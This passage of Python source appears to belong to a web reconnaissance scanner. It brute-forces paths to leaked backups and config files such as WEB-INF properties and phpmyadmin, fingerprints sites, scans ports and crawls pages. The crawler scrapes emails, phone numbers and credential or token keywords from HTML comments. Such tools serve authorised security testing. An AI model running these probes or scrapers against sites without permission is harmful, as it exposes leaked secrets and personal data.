"/test2.txt", "/WEB-INF/classes/applicationContext.xml", "/WEB-INF/conf/database_config.properties", "/WEB-INF/classes/rabbitmq.xml", "/ckeditor/samples/sample_posteddata.php", "/proxy.pac", "/sql.php", "/test2.php", "/build.tar.gz", "/WEB-INF/classes/config/applicationContext.xml", "/WEB-INF/dwr.xml", "/readme", "/phpmyadmin/index.php", "/WEB-INF/web.properties", "/readme.html", "/key" ] leaks = Cartesian() leaks.add_data([ '/www', '/1', '/2016', '/2017', '/2018', '/2019', '/wwwroot', '/backup', '/index', '/web', '/test', '/tmp', '/default', '/temp', '/extra', '/file', '/qq', '/up', '/config', '/' + domain ]) leaks.add_data([ '.tar.gz', '.zip', '.rar', '.sql', '.7z', '.bak', '.tar', '.txt', '.log', '.tmp', '.gz', '.bak~', '.sh' ]) path.extend(leaks.build()) index = Cartesian() index.add_data([ '/1', '/l', '/info', '/index', '/admin', '/login', '/qq', '/q', '/shell', '/p', '/a', '/userinfo', '/api', '/common', '/web', '/manage', '/loading', '/left', '/zzzz', '/welcome', '/ma', '/66' ]) index.add_data(ext) path.extend(index.build()) return set(path) def diff(self, text): result = difflib.SequenceMatcher(None, self.notstr, text).quick_ratio() return result def _verify(self, r, goto, title): result = True if r.status_code in BLOCK_CODE: result = False if r.headers['Content-Type'] in BLOCK_CONTYPE: result = False if len(r.text) == self.notlen: result = False if goto == self.goto: result = False for i in PAGE_404: if i in r.text: result = False break if title == self.title and title != 'None': result = False return result def check404(self, url): # 访问一个随机的页面记录404页面的长度与内容 key = str(random.random() * 100) random_url = base64.b64encode(key.encode('utf-8')) url = url + '/' + random_url.decode( 'utf-8') + '.html' try: r = self.req.get(url) self.notstr = r.text[:10000] self.notlen = len(r.text) if r.is_redirect: self.goto = r.headers['Location'] except Exception as e: logging.exception(e) def scan(self, host): try: r = self.req.get(host) if r.is_redirect: goto = r.headers['Location'] else: goto = 'test' if r.headers['Content-Type']: contype = re.sub('\w+/', '', str(r.headers['Content-Type'])) contype = re.sub(';.*', '', contype) else: contype = 'None' text = r.text[:10000] title = re.search('(?<=<title>).*(?=</title>)', text) if self._verify(r, goto, title): if contype == 'html': result = self.diff(text) else: result = 0 if result < 0.8: if title == None: title = 'None' else: title = title.group() title = re.sub(r'\n|\t', '', title) urlresult = parse.urlparse(host) sys.stdout.write(bcolors.OKGREEN + '[+] {}{:^12}{:^14}\t{:^18}\t{:^8}\n'.format( r.status_code, len(r.text), title, contype, str(r.url)) + bcolors.ENDC) data = { urlresult.netloc: { "rsp_code": r.status_code, "rsp_len": len(r.text), "title": title, "contype": contype, "url": urlresult.path } } self.outjson.append(data) except Exception as e: pass return 'OK' def save(self, urls): Sqldb(self.dbname).get_urls(urls) def run(self, task): print(bcolors.RED + 'URLS:' + bcolors.ENDC) with concurrent.futures.ThreadPoolExecutor( max_workers=THREADS) as executor: futures = [executor.submit(self.scan, i) for i in task] for future in concurrent.futures.as_completed(futures): future.result() self.save(self.outjson) # 创建启动任务 def pool(self, host): self.check404(host) task = [] urls = self.get_urls(host) for url in urls: task.append(host + url) self.run(task)
def start(url): host = parse_host(url) ipaddr = parse_ip(host) url = url.strip('/') sys.stdout.write(bcolors.RED + '-' * 100 + '\n' + bcolors.ENDC) sys.stdout.write(bcolors.RED + 'Host: ' + host + '\n' + bcolors.ENDC) sys.stdout.write(bcolors.RED + '-' * 100 + '\n' + bcolors.ENDC) address = geoip(ipaddr) try: # 判断主域名是否开放 req = Requests() r = req.get(url) except Exception as e: pass if 'r' in locals().keys(): wafresult = checkwaf(host) try: coding = chardet.detect(r.content).get('encoding') r.encoding = coding webinfo = (WebPage(r.url, r.text, r.headers).info()) except Exception as e: webinfo = {} if webinfo: sys.stdout.write(bcolors.RED + "Webinfo:\n" + bcolors.ENDC) sys.stdout.write(bcolors.OKGREEN + '[+] Title: {}\n'.format(webinfo.get('title')) + bcolors.ENDC) sys.stdout.write( bcolors.OKGREEN + '[+] Fingerprint: {}\n'.format(webinfo.get('apps')) + bcolors.ENDC) sys.stdout.write(bcolors.OKGREEN + '[+] Server: {}\n'.format(webinfo.get('server')) + bcolors.ENDC) sys.stdout.write(bcolors.OKGREEN + '[+] WAF: {}\n'.format(wafresult) + bcolors.ENDC) else: webinfo = {} wafresult = 'None' pdns = virustotal(host) reverseip = reverse_domain(host) webinfo.update({"pdns": pdns}) webinfo.update({"reverseip": reverseip}) if iscdn(host): open_port = ScanPort(url).pool() else: open_port = ['CDN:0'] osname = osdetect(host) data = { host: { 'WAF': wafresult, 'Ipaddr': ipaddr, 'Address': address, 'Webinfo': webinfo, 'OS': osname, } } web_save(data) Vuln(host, open_port, webinfo.get('apps')).run() if 'r' in locals().keys() and not SCANDIR: dirscan = DirScan('result') dirscan.pool(url)
class Crawl: def __init__(self, host, dbname): self.urls = [] self.js = [] self.domain = '' self.dbname = dbname self.host = host self.result = [] self.req = Requests() def jsparse(self, r): try: html = etree.HTML(r.text) result = html.xpath('//script/@src') for i in result: if not re.search( r'jquery|bootstrap|adsbygoogle|angular|javascript|#|vue|react|51.la/=|map\.baidu\.com|canvas|cnzz\.com|slick\.js|autofill-event\.js|tld\.js|clipboard|Chart\.js', i): if '://' not in i: i = re.sub(r'^/|^\.\./', '', i) i = self.host + '/' + i self.js.append(i) except (AttributeError, AttributeError, ValueError): pass except Exception as e: logging.exception(e) def extr(self, url, body): # html页面内提取邮箱 email = re.findall( r'\b[a-zA-Z0-9_-]+@[a-zA-Z0-9_-]+(?:\.[a-zA-Z0-9_-]+)+', body) if email: self.result.extend( list(map(lambda x: 'URL: ' + url + ' Email: ' + x, email))) # html页面内提取手机号 phone = re.findall( r'\b(?:139|138|137|136|135|134|147|150|151|152|157|158|159|178|182|183|184|187|188|198|130|131|132|155|156|166|185|186|145|175|176|133|153|177|173|180|181|189|199|170|171)[0-9]{8}\b', body) if phone: self.result.extend( list(map(lambda x: 'URL: ' + url + ' Phone: ' + x, phone))) # html注释内提取ip地址 ipaddr = re.findall( r'(?<=<!--).*((?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)).*(?=-->)', body) if ipaddr: self.result.extend(list(map(lambda x: 'IP: ' + x, ipaddr))) # html注释内提取https连接 links = re.findall( r'(?<=<!--).{0,120}((?:http|https):[\w\./\?\-=&]+).{0,120}(?=-->)', body) if links: self.result.extend( list(map(lambda x: 'URL: ' + url + ' Links: ' + x, links))) # html注释内提取a连接 links2 = re.findall( r'(?<=<!--).{0,120}a\shref="([\-\w\.\?:=\&/]+)".{0,120}(?=-->)', body) if links2: self.result.extend( list(map(lambda x: 'URL: ' + url + ' Links: ' + x, links2))) links3 = re.findall( r'(?<=<!--).{0,120}\b(?:usr|pwd|uname|uid|file|upload|manager|webadmin|backup|account|admin|password|pass|user|login|secret|private|crash|root|xxx|fix|todo|secret_key|token|auth_token|access_token|username|authkey|user_id|userid|apikey|api_key|sid|eid|passwd|session_key|SESSION_TOKEN|api_token|access_token_secret|private_key|DB_USERNAME|oauth_token|api_secret_key|备注|笔记|备份|后台|登陆|管理|上传|下载|挂马|挂链)\b.{0,120}(?=-->)', body) if links3: self.result.extend( list(map(lambda x: 'URL: ' + url + ' Links: ' + x, links3))) def parse_html(self, host): try: r = self.req.get(host) self.jsparse(r) self.extr(r.url, r.text) urlparse = parse.urlparse(host) domain = urlparse.netloc if not self.domain: self.domain = domain html = etree.HTML(r.text) result = html.xpath('//a/@href') for link in result: if not re.search('#|mail*|^/$|javascript', link): if 'http' not in link: if urlparse.netloc: link = urlparse.scheme + '://' + urlparse.netloc + '/' + link else: link = 'http://' + host + '/' + link if domain in link: if '=' not in link: self.urls.append(link) except (UnboundLocalError, AttributeError, ValueError): pass except Exception as e: logging.exception(e) self.urls = dedup_url(self.urls) return list(set(self.urls)) def pool(self): result = self.parse_html(self.host) try: with concurrent.futures.ThreadPoolExecutor( max_workers=30) as executor: futures = [executor.submit(self.parse_html, i) for i in result] for future in concurrent.futures.as_completed(futures, timeout=3): future.result() except (EOFError, concurrent.futures._base.TimeoutError): pass except Exception as e: logging.exception(e) jslink = JsLeaks().pool(self.js) self.result.extend(jslink) self.result = list(set(self.result)) for i in self.result: console('Crawl', self.host, i + '\n') Sqldb(self.dbname).get_crawl(self.domain, self.result)